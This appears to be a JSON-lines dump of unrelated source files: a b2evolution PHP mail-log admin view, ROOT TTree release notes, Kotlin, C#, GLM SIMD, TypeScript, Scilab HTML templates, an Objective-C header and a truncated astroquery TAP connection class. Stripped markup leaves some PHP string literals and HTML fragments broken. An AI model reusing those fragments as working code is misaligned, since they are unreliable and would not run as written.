\n\n\n\n\n"} {"text": " Email > Sent\n *\n * This file is part of the evoCore framework - {@link http://evocore.net/}\n * See also {@link https://github.com/b2evolution/b2evolution}.\n *\n * @license GNU GPL v2 - {@link http://b2evolution.net/about/gnu-gpl-license}\n *\n * @copyright (c)2003-2020 by Francois Planque - {@link http://fplanque.com/}\n *\n * @package admin\n */\nif( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page directly.' );\n\nglobal $edited_EmailLog, $admin_url;\n\n$Form = new Form( NULL, 'mail_log', 'post', 'compact' );\n\n$Form->global_icon( T_('Cancel viewing!'), 'close', regenerate_url( 'blog' ) );\n\n$Form->begin_form( 'fform', sprintf( T_('Mail log ID#%s'), $edited_EmailLog->ID ) );\n\n$Form->begin_line( T_('Result'), NULL );\n$result = emlog_result_info( $edited_EmailLog->result, array(), $edited_EmailLog->last_open_ts, $edited_EmailLog->last_click_ts );\n$result .= ' 'email', 'tab' => 'return', 'email' => $edited_EmailLog->to ) ).'\" class=\"'.button_class().' middle\" title=\"'.format_to_output( T_('Go to return log'), 'htmlattr' ).'\">'\n\t\t.get_icon( 'magnifier', 'imgtag', array( 'title' => T_('Go to return log') ) ).' '.T_('Returns').'';\n$Form->info_field( '', $result );\n$Form->end_line( NULL );\n\n\n$Form->info( T_('Date'), mysql2localedatetime_spans( $edited_EmailLog->timestamp ) );\n\n$deleted_user_note = '';\nif( $edited_EmailLog->user_ID > 0 )\n{\n\t$UserCache = & get_UserCache();\n\tif( $User = $UserCache->get_by_ID( $edited_EmailLog->user_ID, false ) )\n\t{\n\t\t$Form->info( T_('To User'), $User->get_identity_link() );\n\t}\n\telse\n\t{\n\t\t$deleted_user_note = '( '.T_( 'Deleted user' ).' )';\n\t}\n}\n\n$Form->begin_line( T_('To'), NULL );\n$to_address = htmlspecialchars($edited_EmailLog->to).$deleted_user_note;\n$to_address .= ' 'email', 'tab' => 'sent', 'email' => $edited_EmailLog->to ) ).'\" class=\"'.button_class().' middle\" title=\"'.format_to_output( T_('Go to return log'), 'htmlattr' ).'\">'\n\t\t.get_icon( 'magnifier', 'imgtag', array( 'title' => T_('Go to send log') ) ).' '.T_('Send Log').'';\n$Form->info_field( '', $to_address );\n$Form->end_line( NULL );\n\n$Form->info( T_('Subject'), '
'.htmlspecialchars($edited_EmailLog->subject).'
' );\n\n$Form->info( T_('Headers'), '
'.htmlspecialchars($edited_EmailLog->headers).'
' );\n\n$mail_contents = mail_log_parse_message( $edited_EmailLog->headers, $edited_EmailLog->message );\n\nif( !empty( $mail_contents ) )\n{\n\tif( !empty( $mail_contents['text'] ) )\n\t{ // Display Plain Text content\n\t\t$plain_text_content = preg_replace( '~\\$secret_content_start\\$.*?\\$secret_content_end\\$~', '***secret-content-removed***', $mail_contents['text']['content'] );\n\t\t$plain_text_content = preg_replace( '~\\$email_key_start\\$(.*?)\\$email_key_end\\$~', '***prevent-tracking-through-log***$1', $plain_text_content );\n\n\t\t$Form->info( T_('Text content'), $mail_contents['text']['type']\n\t\t\t\t.'
'.htmlspecialchars( $plain_text_content ).'
' );\n\t}\n\n\tif( !empty( $mail_contents['html'] ) )\n\t{ // Display HTML content\n\n\t\t$html_content = preg_replace( '~\\$secret_content_start\\$.*?\\$secret_content_end\\$~', '***secret-content-removed***', $mail_contents['html']['content'] );\n\t\t$html_content = preg_replace( '~\\$email_key_start\\$(.*?)\\$email_key_end\\$~', '***prevent-tracking-through-log***$1', $html_content );\n\n\t\tif( ! empty( $mail_contents['html']['head_style'] ) )\n\t\t{ // Print out all styles of email message\n\t\t\techo '';\n\t\t}\n\t\t$div_html_class = empty( $mail_contents['html']['body_class'] ) ? '' : ' '.$mail_contents['html']['body_class'];\n\t\t$div_html_style = empty( $mail_contents['html']['body_style'] ) ? '' : ' style=\"'.$mail_contents['html']['body_style'].'\"';\n\t\t$Form->info( T_('HTML content'), $mail_contents['html']['type']\n\t\t\t\t.'
'.$html_content.'
' );\n\t}\n}\n$emlog_message = preg_replace( '~\\$secret_content_start\\$.*?\\$secret_content_end\\$~', '***secret-content-removed***', $edited_EmailLog->message );\n$emlog_message = preg_replace( '~\\$email_key_start\\$(.*?)\\$email_key_end\\$~', '***prevent-tracking-through-log***$1', $emlog_message );\n$Form->info( T_('Raw email source'), '
'.htmlspecialchars( $emlog_message ).'
' );\n\n$Form->end_form();\n\n?>"} {"text": "
\n
\n\n

Tree

\n
    \n
  • Changed the MaxTreeSize default from 1.9 GBytes to 100 GBytes.
  • \n\n
  • Add new special functions in TTreeFormula (and hence TTree::Draw and TTree::Scan) to calculate the minimum and maximum within an entry:\n
      \n
    • Min$(formula),Max$(formula):
      return the minimum/maximum (within one TTree entry) of the value of the\n elements of the formula given as a parameter (see the short Draw sketch after this list).
    • \n
    • MinIf$(formula,condition),MaxIf$(formula,condition):
      return the minimum (maximum) (within one TTree entry)\n of the value of the elements of the formula given as a parameter\n if they match the condition. If no element matches the condition, the result is zero.\n To avoid the consequent peak at zero, use the pattern:\n
      tree->Draw(\"MinIf$(formula,condition)\",\"condition\");
      \n which will avoid calculating MinIf$ for the entries that have no match\n for the condition.
    • \n
    \n
  • \n
  • Add support in TTreeFormula (and hence TTree::Draw and TTree::Scan) for the ternary condition operator ( cond ? if_expr : else_expr ).
  • \n
  • Significantly (by two orders of magnitude) improved the performance of TTree::Draw when calling C++ functions.
  • \n
  • Replace the functions TSelectorDraw::MakeIndex and TSelectorDraw::GetNameByIndex\n with the function TSelectorDraw::SplitNames.
  • \n
  • Add a return value to SetBranchAddress: a return value greater than or equal to zero indicates success, a negative\nvalue indicates failure (in both cases, the address is still updated). Example:\n
    if (tree->SetBranchAddress(mybranch,&myvar) < 0) {\n   cerr << \"Something went wrong\\n\";\n   return;\n}
    \nThe possible return values are:
      \n
    • kMissingBranch (-5) : Missing branch
    • \n
    • kInternalError (-4) : Internal error (could not find the type corresponding to a data type number).
    • \n
    • kMissingCompiledCollectionProxy (-3) : Missing compiled collection proxy for a compiled collection.
    • \n
    • kMismatch (-2) : Non-Class Pointer type given does not match the type expected by the branch.
    • \n
    • kClassMismatch (-1) : Class Pointer type given does not match the type expected by the branch.
    • \n
    • kMatch (0) : perfect match.
    • \n
    • kMatchConversion (1) : match with (I/O) conversion.
    • \n
    • kMatchConversionCollection (2) : match with (I/O) conversion of the content of a collection.
    • \n
    • kMakeClass (3) : MakeClass mode so we can not check.
    • \n
    • kVoidPtr (4) : void* passed so no check was made.
    • \n
    • kNoCheck (5) : Underlying TBranch not yet available so no check was made.
    • \n
  • \n
  • Ensure that the TTreeCloner (fast merging) is also able to copy 'uninitialized' TStreamerInfo describing abstract classes.
  • \n
  • Repair several use cases of splitting collections of pointers (especially when their split level is 1).
  • \n
  • Several run-time performance improvements.
  • \n
  • In TTree::Fill use fZipBytes instead of fTotBytes for deciding when to flush or autosave.
  • \n
  • Properly handle TTree aliases containing array indices.
  • \n
  • Fix the default sorting order of baskets when the TTree is an older in-memory TTree.\nEnhance the sort order to use the 'entry number' when the seek positions are equal.\nConsequently the default sort order for an older in-memory TTree is now\nessentially kSortBasketsByEntry rather than kSortBasketsByBranch (old 'correct' sort\norder) or 'random' (the 'broken' sort order prior to this release).
  • \n
\n
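As a quick illustration of the new Min$/Max$ functions (referenced above), here is a minimal sketch; the tree pointer and the branch names px and py are assumptions for illustration only:
   // Histogram, for each entry, the largest px value among the elements of that entry\n   tree->Draw(\"Max$(px)\");\n   // Scan the per-entry minimum of py next to the per-entry maximum of px\n   tree->Scan(\"Min$(py):Max$(px)\");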

IMPORTANT enhancement in TTree::Fill:

\n

Slides from a recent seminar describing the main features of ROOT IO and Trees and the recent\nimprovements described below are available at\n http://root.cern.ch/files/brun_lcgapp09.pptx \nor\n http://root.cern.ch/files/brun_lcgapp09.pdf .

\n

The baskets are flushed and the Tree header saved at regular intervals (See AutoFlush and OptimizeBaskets)

\n\n

When the amount of data written so far (fTotBytes) is greater than fAutoFlush (see SetAutoFlush) all the baskets are flushed to disk.\nThis makes future reading faster as it guarantees that baskets belonging to nearby entries will be on the same disk region.

\n

When the first call to flush the baskets happens, we also take this opportunity to optimize the basket buffers.\nWe also check if the number of bytes written is greater than fAutoSave (see SetAutoSave).\nIn this case we also write the Tree header. This makes the Tree recoverable up to this point in case the program writing the Tree crashes.


Note that the user can also decide to call FlushBaskets and AutoSave in the event loop based on the number of events written instead of the number of bytes written; a minimal sketch of this approach follows.
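A minimal sketch of that manual approach, assuming a hypothetical event loop and tree name (the intervals are only examples):

   for (Long64_t i = 0; i < nevents; i++) {
      // ... fill the branch variables for event i ...
      tree->Fill();
      if (i && i % 100000 == 0) tree->FlushBaskets();   // flush the branch buffers every 100k events
      if (i && i % 1000000 == 0) tree->AutoSave();       // save the Tree header every 1M events
   }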


New function TTree::OptimizeBaskets

   void TTree::OptimizeBaskets(Int_t maxMemory, Float_t minComp, Option_t *option)

This function may be called after having filled some entries in a Tree. Using the information in the existing branch buffers, it reassigns new branch buffer sizes to optimize time and memory.


The function computes the best values for the branch buffer sizes such that the total buffer size is less than maxMemory and nearby entries are written at the same time. If the branch compression factor for the data written so far is less than minComp, compression is disabled. If option = "d", an analysis report is printed.


This function may also be called on an existing Tree to figure out the best values, given the information in the Tree header.

   TFile f("myfile.root");
   TTree *T = (TTree*)f.Get("mytreename");
   T->Print();                            // show the branch buffer sizes before optimization
   T->OptimizeBaskets(10000000, 1, "d");
   T->Print();                            // show the branch buffer sizes after optimization

New interface functions to customize the TreeCache

   virtual void  AddBranchToCache(const char *bname, Bool_t subbranches = kFALSE);
   virtual void  AddBranchToCache(TBranch *branch,   Bool_t subbranches = kFALSE);
   virtual void  PrintCacheStats(Option_t* option = "") const;
   virtual void  SetParallelUnzip(Bool_t opt = kTRUE);
   virtual void  SetCacheEntryRange(Long64_t first, Long64_t last);
   virtual void  SetCacheLearnEntries(Int_t n = 10);
   virtual void  StopCacheLearningPhase();
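A minimal sketch of how these calls might be combined (hypothetical tree and branch names; the cache size, entry range, and learning-phase settings are only examples):

   T->SetCacheSize(10000000);           // 10 MBytes of Tree cache
   T->AddBranchToCache("pt", kTRUE);    // cache this branch and its sub-branches
   T->SetCacheEntryRange(0, 500000);    // only this entry range will be cached
   T->SetCacheLearnEntries(100);        // learn the access pattern on the first 100 entries
   T->StopCacheLearningPhase();         // or end the learning phase explicitly
   T->PrintCacheStats();                // report cache usage at the end of the job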

New functionality AutoFlush (and changes to AutoSave)

Implement a new data member fAutoFlush in TTree, with its getter and setter:

   void TTree::SetAutoFlush(Long64_t autof)

The logic of the AutoFlush mechanism is optimized such that the TreeCache will always read up to the point where FlushBaskets has been called. This minimizes the number of cases where one has to seek backward when reading.

This function may be called at the start of a program to change the default value of fAutoFlush; see the usage sketch below.
  • CASE 1: autof > 0

    autof is the number of consecutive entries after which TTree::Fill will flush all branch buffers to disk.

  • CASE 2: autof < 0

    When filling the Tree, the branch buffers will be flushed to disk when more than -autof bytes have been written to the file. At the first FlushBaskets, TTree::Fill will replace fAutoFlush with the current value of fEntries.

    Calling this function with autof < 0 is useful when it is hard to estimate the size of one entry; the value is also independent of the Tree.

    When calling SetAutoFlush with no arguments, the default value is -30000000, i.e. the first AutoFlush is done when 30 MBytes of data have been written to the file.

  • CASE 3: autof = 0

    The AutoFlush mechanism is disabled.

Flushing the buffers at regular intervals optimizes the location of consecutive entries on the disk.

Changed the default value of AutoSave from 10 to 30 MBytes.
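A minimal usage sketch of the three cases above (hypothetical tree name; the thresholds are only examples):

   tree->SetAutoFlush(1000);        // CASE 1: flush the branch buffers every 1000 entries
   tree->SetAutoFlush(-30000000);   // CASE 2: flush after roughly 30 MBytes have been written (the default)
   tree->SetAutoFlush(0);           // CASE 3: disable the AutoFlush mechanism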

New class TTreePerfStats

This new class is an important tool to measure the I/O performance of a Tree. It shows which locations in the file are read when reading a Tree; in particular, it makes it easy to see the performance of the Tree Cache. The results can be:

  • drawn in a canvas,
  • printed on standard output, or
  • saved to a file for later processing.
   Example of use:

   {
      TFile *f = TFile::Open("RelValMinBias-GEN-SIM-RECO.root");
      T = (TTree*)f->Get("Events");
      Long64_t nentries = T->GetEntries();
      T->SetCacheSize(10000000);
      T->AddBranchToCache("*");

      TTreePerfStats *ps = new TTreePerfStats("ioperf", T);

      for (Int_t i = 0; i < nentries; i++) {
         T->GetEntry(i);
      }
      ps->SaveAs("atlas_perf.root");
   }

Then, in a ROOT interactive session, one can do:

   root > TFile f("atlas_perf.root");
   root > ioperf->Draw();
   root > ioperf->Print();

The Draw or Print functions print the following information:

   TreeCache = TTree cache size in MBytes
   N leaves  = Number of leaves in the TTree
   ReadTotal = Total number of zipped bytes read
   ReadUnZip = Total number of unzipped bytes read
   ReadCalls = Total number of disk reads
   ReadSize  = Average read size in KBytes
   Readahead = Readahead size in KBytes
   Readextra = Readahead overhead in percent
   Real Time = Real time in seconds
   CPU  Time = CPU time in seconds
   Disk Time = Real time spent in pure raw disk I/O
   Disk IO   = Raw disk I/O speed in MBytes/second
   ReadUZRT  = Unzipped MBytes per real-time second
   ReadUZCP  = Unzipped MBytes per CPU second
   ReadRT    = Zipped MBytes per real-time second
   ReadCP    = Zipped MBytes per CPU second

The figure below shows the result for an original, non-optimized file when the Tree Cache is not used.

[Figure: non-optimized file, Tree Cache not used]


The figure below shows the result for the above data file written with the new version of ROOT and with the Tree Cache activated.

[Figure: optimized file, Tree Cache activated]

\n\n\n\n\n"} {"text": "/*\n * Copyright 2017 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage app.tivi.tmdb\n\nprivate val IMAGE_SIZE_PATTERN = \"w(\\\\d+)$\".toRegex()\n\ndata class TmdbImageUrlProvider(\n private val baseImageUrl: String = TmdbImageSizes.baseImageUrl,\n private val posterSizes: List = TmdbImageSizes.posterSizes,\n private val backdropSizes: List = TmdbImageSizes.backdropSizes,\n private val logoSizes: List = TmdbImageSizes.logoSizes\n) {\n fun getPosterUrl(path: String, imageWidth: Int): String {\n return \"$baseImageUrl${selectSize(posterSizes, imageWidth)}$path\"\n }\n\n fun getBackdropUrl(path: String, imageWidth: Int): String {\n return \"$baseImageUrl${selectSize(backdropSizes, imageWidth)}$path\"\n }\n\n fun getLogoUrl(path: String, imageWidth: Int): String {\n return \"$baseImageUrl${selectSize(logoSizes, imageWidth)}$path\"\n }\n\n private fun selectSize(sizes: List, imageWidth: Int): String {\n var previousSize: String? = null\n var previousWidth = 0\n\n for (i in sizes.indices) {\n val size = sizes[i]\n val sizeWidth = extractWidthAsIntFrom(size) ?: continue\n\n if (sizeWidth > imageWidth) {\n if (previousSize != null && imageWidth > (previousWidth + sizeWidth) / 2) {\n return size\n } else if (previousSize != null) {\n return previousSize\n }\n } else if (i == sizes.size - 1) {\n // If we get here then we're larger than the last bucket\n if (imageWidth < sizeWidth * 2) {\n return size\n }\n }\n\n previousSize = size\n previousWidth = sizeWidth\n }\n\n return previousSize ?: sizes.last()\n }\n\n private fun extractWidthAsIntFrom(size: String): Int? 
{\n return IMAGE_SIZE_PATTERN.matchEntire(size)?.groups?.get(1)?.value?.toInt()\n }\n}\n"} {"text": "// -------------------------------------------------------------------------------------------\n// \n// MapWindow OSS Team - 2015\n// \n// -------------------------------------------------------------------------------------------\n\nusing System.Collections;\nusing System.Collections.Generic;\nusing MW5.Plugins.Printing.Model.Elements;\n\nnamespace MW5.Plugins.Printing.Model\n{\n internal class LayoutElementCollection : IEnumerable\n {\n private readonly List _elements;\n\n public LayoutElementCollection()\n {\n _elements = new List();\n }\n\n /// \n /// Returns an enumerator that iterates through the collection.\n /// \n public IEnumerator GetEnumerator()\n {\n return _elements.GetEnumerator();\n }\n\n /// \n /// Returns an enumerator that iterates through a collection.\n /// \n IEnumerator IEnumerable.GetEnumerator()\n {\n return GetEnumerator();\n }\n }\n}"} {"text": "/// @ref core\n/// @file glm/detail/func_common_simd.inl\n\n#if GLM_ARCH & GLM_ARCH_SSE2_BIT\n\n#include \"../simd/common.h\"\n\n#include \n\nnamespace glm{\nnamespace detail\n{\n\ttemplate\n\tstruct compute_abs_vector<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_abs(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_abs_vector<4, int, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, int, Q> call(vec<4, int, Q> const& v)\n\t\t{\n\t\t\tvec<4, int, Q> result;\n\t\t\tresult.data = glm_ivec4_abs(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_floor<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_floor(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_ceil<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_ceil(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_fract<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_fract(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_round<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_round(v.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_mod<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& x, vec<4, float, Q> const& y)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = glm_vec4_mod(x.data, y.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_min_vector<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v1, vec<4, float, Q> const& v2)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = _mm_min_ps(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_min_vector<4, int, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, int, Q> call(vec<4, int, Q> const& v1, vec<4, int, Q> const& v2)\n\t\t{\n\t\t\tvec<4, int, Q> result;\n\t\t\tresult.data = 
_mm_min_epi32(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_min_vector<4, uint, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, uint, Q> call(vec<4, uint, Q> const& v1, vec<4, uint, Q> const& v2)\n\t\t{\n\t\t\tvec<4, uint, Q> result;\n\t\t\tresult.data = _mm_min_epu32(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_max_vector<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& v1, vec<4, float, Q> const& v2)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = _mm_max_ps(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_max_vector<4, int, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, int, Q> call(vec<4, int, Q> const& v1, vec<4, int, Q> const& v2)\n\t\t{\n\t\t\tvec<4, int, Q> result;\n\t\t\tresult.data = _mm_max_epi32(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_max_vector<4, uint, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, uint, Q> call(vec<4, uint, Q> const& v1, vec<4, uint, Q> const& v2)\n\t\t{\n\t\t\tvec<4, uint, Q> result;\n\t\t\tresult.data = _mm_max_epu32(v1.data, v2.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_clamp_vector<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& x, vec<4, float, Q> const& minVal, vec<4, float, Q> const& maxVal)\n\t\t{\n\t\t\tvec<4, float, Q> result;\n\t\t\tresult.data = _mm_min_ps(_mm_max_ps(x.data, minVal.data), maxVal.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_clamp_vector<4, int, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, int, Q> call(vec<4, int, Q> const& x, vec<4, int, Q> const& minVal, vec<4, int, Q> const& maxVal)\n\t\t{\n\t\t\tvec<4, int, Q> result;\n\t\t\tresult.data = _mm_min_epi32(_mm_max_epi32(x.data, minVal.data), maxVal.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_clamp_vector<4, uint, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, uint, Q> call(vec<4, uint, Q> const& x, vec<4, uint, Q> const& minVal, vec<4, uint, Q> const& maxVal)\n\t\t{\n\t\t\tvec<4, uint, Q> result;\n\t\t\tresult.data = _mm_min_epu32(_mm_max_epu32(x.data, minVal.data), maxVal.data);\n\t\t\treturn result;\n\t\t}\n\t};\n\n\ttemplate\n\tstruct compute_mix_vector<4, float, bool, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& x, vec<4, float, Q> const& y, vec<4, bool, Q> const& a)\n\t\t{\n\t\t\t__m128i const Load = _mm_set_epi32(-static_cast(a.w), -static_cast(a.z), -static_cast(a.y), -static_cast(a.x));\n\t\t\t__m128 const Mask = _mm_castsi128_ps(Load);\n\n\t\t\tvec<4, float, Q> Result;\n#\t\t\tif 0 && GLM_ARCH & GLM_ARCH_AVX\n\t\t\t\tResult.data = _mm_blendv_ps(x.data, y.data, Mask);\n#\t\t\telse\n\t\t\t\tResult.data = _mm_or_ps(_mm_and_ps(Mask, y.data), _mm_andnot_ps(Mask, x.data));\n#\t\t\tendif\n\t\t\treturn Result;\n\t\t}\n\t};\n/* FIXME\n\ttemplate\n\tstruct compute_step_vector\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& edge, vec<4, float, Q> const& x)\n\t\t{\n\t\t\tvec<4, float, Q> Result;\n\t\t\tresult.data = glm_vec4_step(edge.data, x.data);\n\t\t\treturn result;\n\t\t}\n\t};\n*/\n\ttemplate\n\tstruct compute_smoothstep_vector<4, float, Q, true>\n\t{\n\t\tGLM_FUNC_QUALIFIER static vec<4, float, Q> call(vec<4, float, Q> const& edge0, vec<4, float, Q> const& edge1, vec<4, float, Q> const& 
x)\n\t\t{\n\t\t\tvec<4, float, Q> Result;\n\t\t\tResult.data = glm_vec4_smoothstep(edge0.data, edge1.data, x.data);\n\t\t\treturn Result;\n\t\t}\n\t};\n}//namespace detail\n}//namespace glm\n\n#endif//GLM_ARCH & GLM_ARCH_SSE2_BIT\n"} {"text": "
\n"} {"text": "module Side {\n 'use strict';\n\n import Paths = Constants.Paths;\n let Page = Paths.Side;\n\n angular.module(Page.Base, [])\n .config(statesConfiguration);\n\n function statesConfiguration(\n $stateProvider: ng.ui.IStateProvider\n ): void {\n\n $stateProvider\n .state(Paths.Tabs + '.' + Page.Left, {\n url: '/' + Page.Left,\n views: {\n 'left-tab': {\n templateUrl: Paths.Modules + 'side/views/left.html'\n }\n }\n }\n );\n }\n}\n"} {"text": "\n\n\n\n \n \n\n \n \n\n"} {"text": "\n\n \n <!--<title>--> <!--<subtitle>-->\n \n \n \n \n \n \n
\n
\n\t\n
\n
\n\n\t
\n\t \n\t \n\t \n\t \n\t \n\t \n\t
\n\t
\n\n\t\n\n\t
\n\t \n\t \n\t \n\t \n\t \n\t \n\t
\n\t
\n\n\t
\n\t \n\t
\n\n\t
\n\t
\n\t Scilab Enterprises
\n\t Copyright (c) 2011-2014 (Scilab Enterprises)
\n\t Copyright (c) 1989-2012 (INRIA)
\n\t Copyright (c) 1989-2007 (ENPC)
\n\t with contributors\n\t
\n\n\t
\n\t Last updated:
\n\t


\n\t
\n\t
\n
\n
\n \n\n"} {"text": "//\n// Generated by class-dump 3.5 (64 bit) (Debug version compiled Oct 15 2018 10:31:50).\n//\n// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.\n//\n\n#import \n\n@class NSNumber, NSString;\n\n@interface CEMSystemNotificationsDeclaration_NotificationSettingsItem : CEMPayloadBase\n{\n NSString *_payloadBundleIdentifier;\n NSNumber *_payloadNotificationsEnabled;\n NSNumber *_payloadShowInNotificationCenter;\n NSNumber *_payloadShowInLockScreen;\n NSNumber *_payloadAlertType;\n NSNumber *_payloadBadgesEnabled;\n NSNumber *_payloadSoundsEnabled;\n NSNumber *_payloadShowInCarPlay;\n NSNumber *_payloadEmergencyEnabled;\n NSNumber *_payloadCriticalAlertEnabled;\n NSNumber *_payloadGroupingType;\n}\n\n+ (id)buildRequiredOnlyWithBundleIdentifier:(id)arg1;\n+ (id)buildWithBundleIdentifier:(id)arg1 withNotificationsEnabled:(id)arg2 withShowInNotificationCenter:(id)arg3 withShowInLockScreen:(id)arg4 withAlertType:(id)arg5 withBadgesEnabled:(id)arg6 withSoundsEnabled:(id)arg7 withShowInCarPlay:(id)arg8 withEmergencyEnabled:(id)arg9 withCriticalAlertEnabled:(id)arg10 withGroupingType:(id)arg11;\n+ (id)allowedPayloadKeys;\n- (void).cxx_destruct;\n@property(copy, nonatomic) NSNumber *payloadGroupingType; // @synthesize payloadGroupingType=_payloadGroupingType;\n@property(copy, nonatomic) NSNumber *payloadCriticalAlertEnabled; // @synthesize payloadCriticalAlertEnabled=_payloadCriticalAlertEnabled;\n@property(copy, nonatomic) NSNumber *payloadEmergencyEnabled; // @synthesize payloadEmergencyEnabled=_payloadEmergencyEnabled;\n@property(copy, nonatomic) NSNumber *payloadShowInCarPlay; // @synthesize payloadShowInCarPlay=_payloadShowInCarPlay;\n@property(copy, nonatomic) NSNumber *payloadSoundsEnabled; // @synthesize payloadSoundsEnabled=_payloadSoundsEnabled;\n@property(copy, nonatomic) NSNumber *payloadBadgesEnabled; // @synthesize payloadBadgesEnabled=_payloadBadgesEnabled;\n@property(copy, nonatomic) NSNumber *payloadAlertType; // @synthesize payloadAlertType=_payloadAlertType;\n@property(copy, nonatomic) NSNumber *payloadShowInLockScreen; // @synthesize payloadShowInLockScreen=_payloadShowInLockScreen;\n@property(copy, nonatomic) NSNumber *payloadShowInNotificationCenter; // @synthesize payloadShowInNotificationCenter=_payloadShowInNotificationCenter;\n@property(copy, nonatomic) NSNumber *payloadNotificationsEnabled; // @synthesize payloadNotificationsEnabled=_payloadNotificationsEnabled;\n@property(copy, nonatomic) NSString *payloadBundleIdentifier; // @synthesize payloadBundleIdentifier=_payloadBundleIdentifier;\n- (id)copyWithZone:(struct _NSZone *)arg1;\n- (id)serializePayloadWithAssetProviders:(id)arg1;\n- (BOOL)loadPayload:(id)arg1 error:(id *)arg2;\n\n@end\n\n"} {"text": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\r\n\"\"\"\r\n=============\r\nTAP plus\r\n=============\r\n\r\n@author: Juan Carlos Segovia\r\n@contact: juan.carlos.segovia@sciops.esa.int\r\n\r\nEuropean Space Astronomy Centre (ESAC)\r\nEuropean Space Agency (ESA)\r\n\r\nCreated on 30 jun. 
2016\r\n\r\n\r\n\"\"\"\r\n\r\ntry:\r\n # python 3\r\n import http.client as httplib\r\nexcept ImportError:\r\n # python 2\r\n import httplib\r\nimport mimetypes\r\nimport time\r\n\r\nfrom six.moves.urllib.parse import urlencode\r\n\r\nfrom astroquery.utils.tap.xmlparser import utils\r\nfrom astroquery.utils.tap import taputils\r\n\r\nimport requests\r\n\r\n__all__ = ['TapConn']\r\n\r\nCONTENT_TYPE_POST_DEFAULT = \"application/x-www-form-urlencoded\"\r\n\r\n\r\nclass TapConn(object):\r\n \"\"\"TAP plus connection class\r\n Provides low level HTTP connection capabilities\r\n \"\"\"\r\n\r\n def __init__(self, ishttps,\r\n host,\r\n server_context=None,\r\n port=80,\r\n sslport=443,\r\n connhandler=None,\r\n tap_context=None,\r\n upload_context=None,\r\n table_edit_context=None,\r\n data_context=None,\r\n datalink_context=None):\r\n\r\n \"\"\"Constructor\r\n\r\n Parameters\r\n ----------\r\n ishttps: bool, mandatory\r\n 'True' is the protocol to use is HTTPS\r\n host : str, mandatory\r\n host name\r\n server_context : str, mandatory\r\n server context\r\n tap_context : str, optional\r\n tap context\r\n upload_context : str, optional\r\n upload context\r\n table_edit_context : str, optional\r\n table edit context\r\n data_context : str, optional\r\n data context\r\n 